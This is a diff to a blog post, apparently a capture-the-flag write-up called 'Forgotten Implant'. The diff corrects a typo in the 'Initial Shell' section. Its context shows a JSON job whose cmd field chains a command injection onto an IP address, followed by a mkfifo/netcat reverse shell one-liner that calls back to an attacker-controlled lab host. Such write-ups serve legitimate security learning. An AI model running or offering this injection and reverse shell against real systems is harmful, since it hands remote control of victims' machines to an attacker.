noncenz/noncenz.github.io/_posts/2023-08-01-Forgotten Implant .md

 # Initial Shell

-Some of the more popular shells don’t seem to work on this box but eventualll we find one that does.
+Some of the more popular shells don’t seem to work on this box but eventually we find one that does.

 ```json
 {"job_id": 0, "cmd": "127.0.0.1 && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.74.177 4444 >/tmp/f"}